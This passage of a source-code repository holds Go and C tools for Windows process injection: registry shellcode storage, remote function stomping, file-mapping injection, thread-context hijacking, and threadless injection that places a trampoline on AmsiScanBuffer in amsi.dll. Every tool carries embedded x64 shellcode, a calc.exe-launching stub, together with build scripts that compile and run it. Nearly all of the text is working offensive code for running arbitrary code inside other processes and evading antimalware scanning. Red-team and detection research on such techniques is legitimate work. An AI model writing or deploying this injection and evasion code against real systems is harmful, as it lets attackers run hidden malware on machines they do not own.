} 32 | 33 | RegCloseKey(hkey); 34 | } 35 | 36 | void readreg() { 37 | DWORD dataSize = 0; 38 | DWORD type = REG_BINARY; 39 | LONG status = RegGetValueA( 40 | HKEY_CURRENT_USER, 41 | "Control Panel", 42 | "Evilbytecode", 43 | RRF_RT_ANY, 44 | &type, 45 | NULL, 46 | &dataSize 47 | ); 48 | if (status != ERROR_SUCCESS && status != ERROR_MORE_DATA) { 49 | printf("[!] RegGetValueA Failed With Error: %ld\n", status); 50 | return; 51 | } 52 | 53 | BYTE *data = (BYTE*) malloc(dataSize); 54 | if (!data) { 55 | printf("[!] Memory allocation failed\n"); 56 | return; 57 | } 58 | 59 | status = RegGetValueA( 60 | HKEY_CURRENT_USER, 61 | "Control Panel", 62 | "Evilbytecode", 63 | RRF_RT_ANY, 64 | &type, 65 | data, 66 | &dataSize 67 | ); 68 | if (status != ERROR_SUCCESS) { 69 | printf("[!] RegGetValueA Failed With Error: %ld\n", status); 70 | free(data); 71 | return; 72 | } 73 | 74 | printf("[+] RegGetValueA Succeeded: "); 75 | for (DWORD i = 0; i < dataSize; i++) { 76 | printf("%02x ", data[i]); 77 | } 78 | printf("\n"); 79 | 80 | free(data); 81 | } 82 | -------------------------------------------------------------------------------- /Registry_Shellcode/Registry_Shellcode.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | /* 4 | #include 5 | 6 | void writereg(BYTE *buf, DWORD size); 7 | void readreg(); 8 | */ 9 | import "C" 10 | import ( 11 | "unsafe" 12 | ) 13 | 14 | func main() { 15 | // start calc.exe (btw you need to customize this a bit lol) 16 | buf := []byte{ 17 | 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 18 | 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 19 | 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 20 | 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 21 | 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 22 | 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 23 | 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 24 | } 25 | 26 | C.writereg((*C.BYTE)(unsafe.Pointer(&buf[0])), C.DWORD(len(buf))) 27 | C.readreg() 28 | println("[+] Registry operations completed successfully") 29 | } 30 | -------------------------------------------------------------------------------- /Registry_Shellcode/build.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | go build -o RegSC.exe 3 | ./RegSC.exe 4 | exit -------------------------------------------------------------------------------- /Remote_Function_Stomping_Injection/RemoteFuncMapper.c: -------------------------------------------------------------------------------- 1 | // RemoteFuncMapper.c 2 | #include "RemoteFuncMapper.h" 3 | #include 4 | #include 5 | #include 6 | 7 | HANDLE find_process(const char* name) { 8 | HANDLE hProcessSnap; 9 | PROCESSENTRY32 pe32; 10 | HANDLE hProcess = NULL; 11 | 12 | hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 13 | if (hProcessSnap == INVALID_HANDLE_VALUE) { 14 | return NULL; 15 | } 16 | 17 | pe32.dwSize = sizeof(PROCESSENTRY32); 18 | 19 | if (!Process32First(hProcessSnap, &pe32)) { 20 | CloseHandle(hProcessSnap); 21 | return NULL; 22 | } 23 | 24 | do { 25 | if (strcmp(pe32.szExeFile, name) == 0) { 26 | hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); 27 | break; 28 | } 29 | } while (Process32Next(hProcessSnap, &pe32)); 30 | 31 | CloseHandle(hProcessSnap); 32 | return hProcess; 33 | } 34 | 35 | void inject_shellcode(HANDLE hprocess, unsigned char* shellcode, size_t size) { 36 | LPVOID pRemoteCode; 37 | DWORD oldProtect; 38 | HANDLE hThread; 39 | pRemoteCode = VirtualAllocEx(hprocess, NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 40 | if (pRemoteCode == NULL) { 41 | return; 42 | } 43 | WriteProcessMemory(hprocess, pRemoteCode, shellcode, size, NULL); 44 | VirtualProtectEx(hprocess, pRemoteCode, size, PAGE_EXECUTE_READ, &oldProtect); 45 | hThread = CreateRemoteThread(hprocess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL); 46 | if (hThread != NULL) { 47 | WaitForSingleObject(hThread, INFINITE); 48 | CloseHandle(hThread); 49 | } 50 | VirtualFreeEx(hprocess, pRemoteCode, 0, MEM_RELEASE); 51 | } 52 | -------------------------------------------------------------------------------- /Remote_Function_Stomping_Injection/RemoteFuncMapper.h: -------------------------------------------------------------------------------- 1 | // RemoteFuncMapper.h 2 | #ifndef REMOTE_FUNC_MAPPER_H 3 | #define REMOTE_FUNC_MAPPER_H 4 | 5 | #include 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | HANDLE find_process(const char* name); 12 | void inject_shellcode(HANDLE hprocess, unsigned char* shellcode, size_t size); 13 | 14 | #ifdef __cplusplus 15 | } 16 | #endif 17 | 18 | #endif // REMOTE_FUNC_MAPPER_H 19 | -------------------------------------------------------------------------------- /Remote_Function_Stomping_Injection/Remote_Function_Stomping_Injection.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | /* 4 | #cgo CFLAGS: -I. 5 | #cgo LDFLAGS: -lkernel32 -luser32 6 | #include "RemoteFuncMapper.h" 7 | */ 8 | import "C" 9 | import ( 10 | "fmt" 11 | "unsafe" 12 | ) 13 | 14 | func findProcess(name string) (C.HANDLE, error) { 15 | cName := C.CString(name) // Convert Go string to C string and after we Free the C string after use :cool: 16 | defer C.free(unsafe.Pointer(cName)) 17 | handle := C.find_process(cName) 18 | if handle == nil { 19 | return nil, fmt.Errorf("process not found") 20 | } 21 | return handle, nil 22 | } 23 | 24 | func injectShellcode(hProcess C.HANDLE, shellcode []byte) { 25 | size := C.size_t(len(shellcode)) 26 | shellcodePtr := unsafe.Pointer(&shellcode[0]) 27 | C.inject_shellcode(hProcess, (*C.uchar)(shellcodePtr), size) 28 | } 29 | 30 | func main() { 31 | // start calc.exe 32 | shellcode := []byte{ 33 | 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 34 | 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 35 | 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 36 | 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 37 | 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 38 | 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 39 | 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 40 | } 41 | 42 | processName := "notepad.exe" 43 | hProcess, err := findProcess(processName) 44 | if err != nil { 45 | fmt.Println("Error:", err) 46 | return 47 | } 48 | 49 | injectShellcode(hProcess, shellcode) 50 | } 51 | -------------------------------------------------------------------------------- /Remote_Function_Stomping_Injection/build.bat: -------------------------------------------------------------------------------- 1 | @Echo off 2 | go build -o Remote_Function_Stomping_Injection.exe 3 | ./Remote_Function_Stomping_Injection.exe 4 | exit -------------------------------------------------------------------------------- /Remote_Mapping_Injection/Remote_Mapper.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | DWORD FindProc(const char* process_name) { 6 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 7 | if (snapshot == INVALID_HANDLE_VALUE) { 8 | printf("[-] Failed to create snapshot. Error: %lu\n", GetLastError()); 9 | return 0; 10 | } 11 | 12 | PROCESSENTRY32 process_entry; 13 | process_entry.dwSize = sizeof(PROCESSENTRY32); 14 | 15 | if (!Process32First(snapshot, &process_entry)) { 16 | printf("[-] Failed to retrieve process information. Error: %lu\n", GetLastError()); 17 | CloseHandle(snapshot); 18 | return 0; 19 | } 20 | 21 | DWORD pid = 0; 22 | do { 23 | if (strcmp(process_entry.szExeFile, process_name) == 0) { 24 | pid = process_entry.th32ProcessID; 25 | printf("[+] Found process '%s' with PID %lu\n", process_name, pid); 26 | break; 27 | } 28 | } while (Process32Next(snapshot, &process_entry)); 29 | 30 | CloseHandle(snapshot); 31 | if (pid == 0) { 32 | printf("[-] Process '%s' not found.\n", process_name); 33 | } 34 | return pid; 35 | } 36 | 37 | void execSC(const unsigned char* shellcode, size_t shellcode_size, const char* process_name) { 38 | DWORD pid = FindProc(process_name); 39 | if (pid == 0) { 40 | printf("[-] Error finding the PID of the mentioned process!\n"); 41 | return; 42 | } 43 | 44 | HANDLE hprocess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 45 | if (hprocess == NULL) { 46 | printf("[-] OpenProcess failed with error %lu\n", GetLastError()); 47 | return; 48 | } 49 | printf("[+] Successfully opened process with PID %lu\n", pid); 50 | 51 | HANDLE hfile = CreateFileMappingA( 52 | INVALID_HANDLE_VALUE, 53 | NULL, 54 | PAGE_EXECUTE_READWRITE, 55 | 0, 56 | (DWORD)shellcode_size, 57 | NULL 58 | ); 59 | 60 | if (hfile == NULL) { 61 | printf("[-] CreateFileMappingA failed with error %lu\n", GetLastError()); 62 | CloseHandle(hprocess); 63 | return; 64 | } 65 | printf("[+] Successfully created file mapping.\n"); 66 | 67 | void* map_address = MapViewOfFile( 68 | hfile, 69 | FILE_MAP_WRITE | FILE_MAP_EXECUTE, 70 | 0, 71 | 0, 72 | shellcode_size 73 | ); 74 | 75 | if (map_address == NULL) { 76 | printf("[-] MapViewOfFile failed with error %lu\n", GetLastError()); 77 | CloseHandle(hfile); 78 | CloseHandle(hprocess); 79 | return; 80 | } 81 | printf("[+] Successfully mapped view of file.\n"); 82 | 83 | memcpy(map_address, shellcode, shellcode_size); 84 | printf("[+] Successfully copied shellcode to the mapped memory.\n"); 85 | 86 | HANDLE hthread = CreateRemoteThread( 87 | hprocess, 88 | NULL, 89 | 0, 90 | (LPTHREAD_START_ROUTINE)map_address, 91 | NULL, 92 | 0, 93 | NULL 94 | ); 95 | 96 | if (hthread == NULL) { 97 | printf("[-] CreateRemoteThread failed with error %lu\n", GetLastError()); 98 | } else { 99 | printf("[+] Successfully created remote thread. Waiting for it to finish...\n"); 100 | WaitForSingleObject(hthread, INFINITE); 101 | CloseHandle(hthread); 102 | printf("[+] Remote thread completed.\n"); 103 | } 104 | 105 | UnmapViewOfFile(map_address); 106 | printf("[+] Unmapped view of file.\n"); 107 | CloseHandle(hfile); 108 | printf("[+] Closed file mapping handle.\n"); 109 | CloseHandle(hprocess); 110 | printf("[+] Closed process handle.\n"); 111 | printf("[+] Shellcode Injected.\n"); 112 | } 113 | -------------------------------------------------------------------------------- /Remote_Mapping_Injection/Remote_Mapping_Injection.go: -------------------------------------------------------------------------------- 1 | // Remote_Mapping_Injection.go 2 | 3 | package main 4 | 5 | /* 6 | #cgo LDFLAGS: -lpsapi 7 | #include 8 | #include "Remote_Mapper.c" 9 | 10 | void execSC(const unsigned char* shellcode, size_t shellcode_size, const char* process_name); 11 | */ 12 | import "C" 13 | 14 | func main() { 15 | // start calc.exe 16 | shellcode := []byte{ 17 | 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 18 | 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 19 | 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 20 | 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 21 | 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 22 | 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 23 | 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 24 | } 25 | 26 | ProcName := "notepad.exe" 27 | 28 | C.execSC( 29 | (*C.uchar)(&shellcode[0]), 30 | C.size_t(len(shellcode)), 31 | C.CString(ProcName), 32 | ) 33 | } -------------------------------------------------------------------------------- /Remote_Thread_Hijacking/Remote_Thread_Hijacking.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | /* 4 | #cgo LDFLAGS: -luser32 -lkernel32 5 | #include "remote_thread_hijacking.c" 6 | #include 7 | #include 8 | */ 9 | import "C" 10 | import ( 11 | "fmt" 12 | "log" 13 | "unsafe" 14 | ) 15 | 16 | const ( 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | MEM_COMMIT = 0x00001000 19 | MEM_RESERVE = 0x00002000 20 | THREAD_ALL_ACCESS = 0x001F03FF 21 | INFINITE = 0xFFFFFFFF 22 | CONTEXT_FULL = 0x00010000 23 | ) 24 | 25 | 26 | var shellcode = []byte{ 27 | 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 28 | 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 29 | 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 30 | 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 31 | 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 32 | 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 33 | 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 34 | } 35 | 36 | 37 | func main() { 38 | name := "notepad.exe" 39 | cName := C.CString(name) 40 | defer C.free(unsafe.Pointer(cName)) 41 | 42 | processHandle := C.find_process(cName) 43 | if processHandle == nil { 44 | log.Fatalf("Error finding process handle") 45 | } 46 | defer C.CloseHandle(processHandle) 47 | 48 | pid := C.GetProcessId(processHandle) 49 | 50 | threadHandle := C.find_thread(pid) 51 | if threadHandle == nil { 52 | log.Fatalf("Error finding thread handle") 53 | } 54 | defer C.CloseHandle(threadHandle) 55 | 56 | size := len(shellcode) 57 | address := C.virtual_alloc_ex(processHandle, C.SIZE_T(size)) 58 | if address == nil { 59 | log.Fatalf("VirtualAllocEx failed") 60 | } 61 | 62 | if success := C.write_process_memory(processHandle, address, unsafe.Pointer(&shellcode[0]), C.SIZE_T(size)); success == 0 { 63 | log.Fatalf("WriteProcessMemory failed") 64 | } 65 | 66 | var oldProtect C.DWORD 67 | if success := C.virtual_protect_ex(processHandle, address, C.SIZE_T(size), C.DWORD(PAGE_EXECUTE_READWRITE), &oldProtect); success == 0 { 68 | log.Fatalf("VirtualProtectEx failed") 69 | } 70 | 71 | var ctx C.CONTEXT 72 | ctx.ContextFlags = C.DWORD(C.CONTEXT_FULL) 73 | if success := C.get_thread_context(threadHandle, &ctx); success == 0 { 74 | log.Fatalf("GetThreadContext failed") 75 | } 76 | 77 | // Convert addr to uintptr then to C.ULONG_PTR 78 | ctx.Rip = C.ULONG_PTR(uintptr(address)) 79 | 80 | if success := C.set_thread_context(threadHandle, &ctx); success == 0 { 81 | log.Fatalf("SetThreadContext failed") 82 | } 83 | 84 | if success := C.resume_thread(threadHandle); success == C.DWORD(0xFFFFFFFF) { 85 | log.Fatalf("ResumeThread failed") 86 | } 87 | 88 | C.wait_for_single_object(threadHandle, C.INFINITE) 89 | 90 | fmt.Println("Thread executed!") 91 | } -------------------------------------------------------------------------------- /Remote_Thread_Hijacking/remote_thread_hijacking.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | // Function to convert a narrow string to a wide string 8 | wchar_t* to_wide_string(const char* str) { 9 | size_t len = mbstowcs(NULL, str, 0); 10 | wchar_t* wide_str = (wchar_t*)malloc((len + 1) * sizeof(wchar_t)); 11 | mbstowcs(wide_str, str, len + 1); 12 | return wide_str; 13 | } 14 | 15 | HANDLE find_process(const char* name) { 16 | HANDLE snapshot; 17 | PROCESSENTRY32 entry; 18 | snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 19 | if (snapshot == INVALID_HANDLE_VALUE) return NULL; 20 | 21 | entry.dwSize = sizeof(PROCESSENTRY32); 22 | if (Process32First(snapshot, &entry)) { 23 | wchar_t* wide_name = to_wide_string(name); 24 | do { 25 | // Convert entry.szExeFile to wide string 26 | wchar_t szExeFileWide[MAX_PATH]; 27 | mbstowcs(szExeFileWide, entry.szExeFile, MAX_PATH); 28 | if (wcscmp(szExeFileWide, wide_name) == 0) { 29 | HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, entry.th32ProcessID); 30 | free(wide_name); 31 | CloseHandle(snapshot); 32 | return process; 33 | } 34 | } while (Process32Next(snapshot, &entry)); 35 | free(wide_name); 36 | } 37 | 38 | CloseHandle(snapshot); 39 | return NULL; 40 | } 41 | 42 | HANDLE find_thread(DWORD pid) { 43 | HANDLE snapshot; 44 | THREADENTRY32 entry; 45 | snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); 46 | if (snapshot == INVALID_HANDLE_VALUE) return NULL; 47 | 48 | entry.dwSize = sizeof(THREADENTRY32); 49 | if (Thread32First(snapshot, &entry)) { 50 | do { 51 | if (entry.th32OwnerProcessID == pid) { 52 | HANDLE thread = OpenThread(THREAD_ALL_ACCESS, FALSE, entry.th32ThreadID); 53 | CloseHandle(snapshot); 54 | return thread; 55 | } 56 | } while (Thread32Next(snapshot, &entry)); 57 | } 58 | 59 | CloseHandle(snapshot); 60 | return NULL; 61 | } 62 | 63 | void* virtual_alloc_ex(HANDLE process, SIZE_T size) { 64 | return VirtualAllocEx(process, NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 65 | } 66 | 67 | BOOL write_process_memory(HANDLE process, void* address, const void* data, SIZE_T size) { 68 | SIZE_T bytes_written; 69 | return WriteProcessMemory(process, address, data, size, &bytes_written) && bytes_written == size; 70 | } 71 | 72 | BOOL virtual_protect_ex(HANDLE process, void* address, SIZE_T size, DWORD new_protect, DWORD* old_protect) { 73 | return VirtualProtectEx(process, address, size, new_protect, old_protect); 74 | } 75 | 76 | BOOL get_thread_context(HANDLE thread, CONTEXT* ctx) { 77 | return GetThreadContext(thread, ctx); 78 | } 79 | 80 | BOOL set_thread_context(HANDLE thread, const CONTEXT* ctx) { 81 | return SetThreadContext(thread, ctx); 82 | } 83 | 84 | DWORD resume_thread(HANDLE thread) { 85 | return ResumeThread(thread); 86 | } 87 | 88 | DWORD wait_for_single_object(HANDLE handle, DWORD timeout) { 89 | return WaitForSingleObject(handle, timeout); 90 | } 91 | -------------------------------------------------------------------------------- /Threadless_Injection/Threadless_Injection.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | /* 4 | #cgo LDFLAGS: -L. -lthreadless_injection_wrapper 5 | #include 6 | */ 7 | import "C" 8 | import ( 9 | "fmt" 10 | "os" 11 | "unsafe" 12 | ) 13 | 14 | func main() { 15 | if len(os.Args) < 2 { 16 | fmt.Println("Usage: ") 17 | return 18 | } 19 | 20 | procname := os.Args[1] 21 | cprocname := C.CString(procname) 22 | defer C.free(unsafe.Pointer(cprocname)) 23 | 24 | pid := C.find_process(cprocname) 25 | if pid == 0 { 26 | fmt.Println("[!] Failed to find the PID of the target process") 27 | return 28 | } 29 | 30 | fmt.Printf("[+] Process ID: %d\n", pid) 31 | 32 | hModule := C.LoadLibraryA(C.CString("amsi.dll")) 33 | if hModule == nil { 34 | fmt.Printf("[!] LoadLibrary Failed With Status %d\n", C.GetLastError()) 35 | return 36 | } 37 | 38 | address := C.GetProcAddress(hModule, C.CString("AmsiScanBuffer")) 39 | if address == nil { 40 | fmt.Printf("[!] GetProcAddress Failed With Status %d\n", C.GetLastError()) 41 | return 42 | } 43 | 44 | hProcess := C.OpenProcess(C.PROCESS_ALL_ACCESS, C.FALSE, pid) 45 | if hProcess == nil { 46 | fmt.Printf("[!] OpenProcess Failed With Status %d\n", C.GetLastError()) 47 | return 48 | } 49 | 50 | addressPtr := unsafe.Pointer(address) 51 | 52 | fmt.Printf("[+] Function: AmsiScanBuffer | Address: %p\n", addressPtr) 53 | 54 | fmt.Println("[+] Looking for a memory hole") 55 | addressRole := C.find_memory_role(C.SIZE_T(uintptr(addressPtr)), hProcess) 56 | if addressRole == nil { 57 | fmt.Println("[!] find_memory_role Failed With Status") 58 | return 59 | } 60 | 61 | fmt.Println("[+] Writing the shellcode") 62 | C.write_shellcode(hProcess, addressRole) 63 | 64 | fmt.Println("[+] Installing the trampoline") 65 | C.install_trampoline(hProcess, addressRole, addressPtr) 66 | 67 | fmt.Println("[+] Finished Sucessfully") 68 | } 69 | -------------------------------------------------------------------------------- /Threadless_Injection/build.bat: -------------------------------------------------------------------------------- 1 | @ECho off 2 | gcc -shared -o threadless_injection_wrapper.dll threadless_injection_wrapper.c 3 | dlltool --dllname threadless_injection_wrapper.dll --input-def threadless_injection_wrapper.def --output-lib threadless_injection_wrapper.lib 4 | go build -o ThreadlessInject.exe 5 | exit -------------------------------------------------------------------------------- /Threadless_Injection/threadless_injection_wrapper.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | // Shellcode and Patch Shellcode 7 | const uint8_t PATCH_SHELLCODE[55] = { 8 | 0x58, 0x48, 0x83, 0xE8, 0x05, 0x50, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 9 | 0x48, 0xB9, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0x48, 0x89, 0x08, 0x48, 0x83, 0xEC, 10 | 0x40, 0xE8, 0x11, 0x00, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59, 11 | 0x41, 0x58, 0x5A, 0x59, 0x58, 0xFF, 0xE0, 12 | }; 13 | // start calc.exe 14 | const uint8_t SHELLCODE[106] = { 15 | 0x53, 0x56, 0x57, 0x55, 0x54, 0x58, 0x66, 0x83, 0xE4, 0xF0, 0x50, 0x6A, 0x60, 0x5A, 0x68, 0x63, 16 | 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x29, 0xD4, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 17 | 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 18 | 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 19 | 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 20 | 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 21 | 0x48, 0x83, 0xC4, 0x68, 0x5C, 0x5D, 0x5F, 0x5E, 0x5B, 0xC3, 22 | }; 23 | 24 | __declspec(dllexport) DWORD find_process(const char* process_name); 25 | __declspec(dllexport) void write_shellcode(HANDLE h_process, void* address); 26 | __declspec(dllexport) void install_trampoline(HANDLE h_process, void* address, void* function_address); 27 | __declspec(dllexport) void* find_memory_role(SIZE_T func_address, HANDLE h_process); 28 | 29 | __declspec(dllexport) DWORD find_process(const char* process_name) { 30 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 31 | if (snapshot == INVALID_HANDLE_VALUE) { 32 | return 0; 33 | } 34 | 35 | PROCESSENTRY32 process_entry = { 0 }; 36 | process_entry.dwSize = sizeof(PROCESSENTRY32); 37 | 38 | if (!Process32First(snapshot, &process_entry)) { 39 | CloseHandle(snapshot); 40 | return 0; 41 | } 42 | 43 | DWORD pid = 0; 44 | do { 45 | if (strcmp(process_entry.szExeFile, process_name) == 0) { 46 | pid = process_entry.th32ProcessID; 47 | break; 48 | } 49 | } while (Process32Next(snapshot, &process_entry)); 50 | 51 | CloseHandle(snapshot); 52 | return pid; 53 | } 54 | 55 | __declspec(dllexport) void* find_memory_role(SIZE_T func_address, HANDLE h_process) { 56 | SIZE_T address = (func_address & 0xFFFFFFFFFFF70000) - 0x70000000; 57 | while (address < func_address + 0x70000000) { 58 | void* tmp_address = VirtualAllocEx( 59 | h_process, 60 | (LPVOID)address, 61 | sizeof(SHELLCODE) + sizeof(PATCH_SHELLCODE), 62 | MEM_COMMIT | MEM_RESERVE, 63 | PAGE_READWRITE 64 | ); 65 | 66 | if (tmp_address) { 67 | printf("[+] Allocated at: %p\n", tmp_address); 68 | return tmp_address; 69 | } 70 | 71 | address += 0x10000; 72 | } 73 | 74 | return NULL; 75 | } 76 | 77 | __declspec(dllexport) void write_shellcode(HANDLE h_process, void* address) { 78 | SIZE_T number_of_write = 0; 79 | WriteProcessMemory( 80 | h_process, 81 | address, 82 | PATCH_SHELLCODE, 83 | sizeof(PATCH_SHELLCODE), 84 | &number_of_write 85 | ); 86 | 87 | SIZE_T shellcode_address = (SIZE_T)address + sizeof(PATCH_SHELLCODE); 88 | WriteProcessMemory( 89 | h_process, 90 | (LPVOID)shellcode_address, 91 | SHELLCODE, 92 | sizeof(SHELLCODE), 93 | &number_of_write 94 | ); 95 | 96 | DWORD old_protect; 97 | VirtualProtectEx( 98 | h_process, 99 | address, 100 | sizeof(SHELLCODE), 101 | PAGE_EXECUTE_READWRITE, 102 | &old_protect 103 | ); 104 | } 105 | 106 | __declspec(dllexport) void install_trampoline(HANDLE h_process, void* address, void* function_address) { 107 | uint8_t trampoline[5] = {0xE8, 0x00, 0x00, 0x00, 0x00}; 108 | DWORD rva = (DWORD)((SIZE_T)address - ((SIZE_T)function_address + sizeof(trampoline))); 109 | memcpy(trampoline + 1, &rva, sizeof(rva)); 110 | 111 | DWORD old_protect; 112 | VirtualProtectEx( 113 | h_process, 114 | function_address, 115 | sizeof(trampoline), 116 | PAGE_READWRITE, 117 | &old_protect 118 | ); 119 | 120 | SIZE_T number_bytes_written; 121 | WriteProcessMemory( 122 | h_process, 123 | function_address, 124 | trampoline, 125 | sizeof(trampoline), 126 | &number_bytes_written 127 | ); 128 | 129 | VirtualProtectEx( 130 | h_process, 131 | function_address, 132 | sizeof(trampoline), 133 | PAGE_EXECUTE_READWRITE, 134 | &old_protect 135 | ); 136 | } 137 | -------------------------------------------------------------------------------- /Threadless_Injection/threadless_injection_wrapper.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | find_process 3 | write_shellcode 4 | install_trampoline 5 | find_memory_role 6 | -------------------------------------------------------------------------------- /Threadless_Injection/threadless_injection_wrapper.h: -------------------------------------------------------------------------------- 1 | // threadless_injection_wrapper.h 2 | 3 | #ifndef THREADLESS_INJECTION_WRAPPER_H 4 | #define THREADLESS_INJECTION_WRAPPER_H 5 | 6 | #include 7 | #include 8 | 9 | #ifdef __cplusplus 10 | extern "C" { 11 | #endif 12 | 13 | __declspec(dllexport) DWORD find_process(const char* process_name); 14 | __declspec(dllexport) void write_shellcode(HANDLE h_process, void* address); 15 | __declspec(dllexport) void install_trampoline(HANDLE h_process, void* address, void* function_address); 16 | __declspec(dllexport) void* find_memory_role(SIZE_T func_address, HANDLE h_process); 17 | 18 | #ifdef __cplusplus 19 | } 20 | #endif 21 | 22 | #endif // THREADLESS_INJECTION_WRAPPER_H 23 | --------------------------------------------------------------------------------